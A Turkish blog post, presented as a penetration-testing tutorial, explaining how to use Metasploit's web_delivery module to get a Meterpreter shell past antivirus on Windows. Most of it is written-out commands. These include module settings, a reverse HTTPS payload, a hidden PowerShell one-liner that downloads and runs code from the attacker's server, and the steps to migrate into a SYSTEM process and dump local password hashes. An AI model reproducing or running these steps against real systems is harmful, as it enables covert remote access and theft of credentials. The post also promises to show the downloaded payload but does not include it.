MSF web_delivery Modülü İle Antivirüslere Yakalanmadan Meterpreter Erişimi Elde Edilmesi

Sızma testleri sırasında antivirüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, MSF web_delivery istismar modülü kullanılarak Powershell tabanlı bir payload hazırlanacak ve hedef bilgisayarda Powershell komutu çalıtırılarak Meterpreter kabuğu elde edilecektir.MSF web_delivery istismar modülü, web sunucusu (Kali) üzerinden kurban sistemlere payload göndermek için kullanılır. Bu modül, kurban sistemlerde çalıştırılan bir komut ile web suncusunda kayıtlı olan zararlı yazılım çağırılarak çalıştırılması için kullanılır. Kurban işletim sisteminde kurumlarda ve son kullanıcı bilgisayarlarında en çok kullanılan anti-virüslerden biri yüklü olmasına rağmen Meterpreter bağlantısının elde edilebildiği görülecektir.Modül ile ilgili temel seçenekler aşağıdaki gibidir.

search web_delivery
use exploit/multi/script/web_delivery
show options

Modülün desteklediği 3 hedef bulunmaktadır: Python, PHP, PSH. Bu yazıda hazırlanacak olan payload, Windows istemcideki Powershell uygulaması için hazırlanacaktır. Modüle ait seçenekler aşağıdaki gibi ayarlanabilir.

set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.100.10
set LPORT 443
set TARGET 2
set SRVPORT 80
show options

Modül başlatılarak, kurban sistemde çalıştırılacak olan komut elde edilir.

exploit

Powershell komutu ile windows komut satırı ile çalıştırıldığında, Kali bilgisayarın 80. portunda çalışan web sunucuya talep yapılmakta ve bir katar (string / payload) indirilip çalıştırılmaktadır.

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://192.168.100.10/NJg3wXgOlVkV4g5′))

Böylece Kali tarafında talep yakalanmaktadır. Powershell komutunu çalıştıran kullanıcı hakları ile 32 bitlik Powershell prosesi üzerinde Meterpreter bağlantısının elde edildiği görülmektedir.

sessions
sessions -i 1
getuid
getpid
ps -U Vedat

Vedat hesabının yerel yönetici olduğu ve bir sıkılaştırma ayarının olmadığı varsayılırsa, yerel kullanıcıların parolasının elde edilebildiği görülmektedir. Meterpreter “hashdump” komutu yapısı gereği, 64 bitlik bir bilgisayarda 64 bitlik SYSTEM yetkileri ile çalışan bir proses üzerinde iken, etkin olarak çalışmaktadır.

ps -s
migrate 1868
hashdump

Powershell betiği tarafından indirilen katar içeriği (http://192.168.100.10/NJg3wXgOlVkV4g5) aşağıdaki gibidir.

Kaynak:

https://www.youtube.com/watch?v=vdnCZZepcUU

Reklamlar

Hakkında Uğur PEK
İşletme ve Teknoloji alanında Yüksek Lisansımı Çukurova Üniversitesinde tamamladım. Microsoft,Oracle,Vmvare,Dell,HP,IBM,NetApp gibi sektörün önde gelen birçok firmasının Workshoplarına, Eventlerına katıldım. Ordu Yardımlaşma Kurumunda IT uzmanı olarak görev yaptım. Şuan Enerji sektörünün önde gelen bir firmasında IT Departmanında İş hayatına devam etmekteyim. İlgi alanlarım Veri Depolama, Backup çözümleri, Vmware Virtualization ve Storage ailesi

Bir Cevap Yazın

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

WordPress.com Logosu

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Twitter resmi

Twitter hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Facebook fotoğrafı

Facebook hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Google+ fotoğrafı

Google+ hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Connecting to %s

%d blogcu bunu beğendi: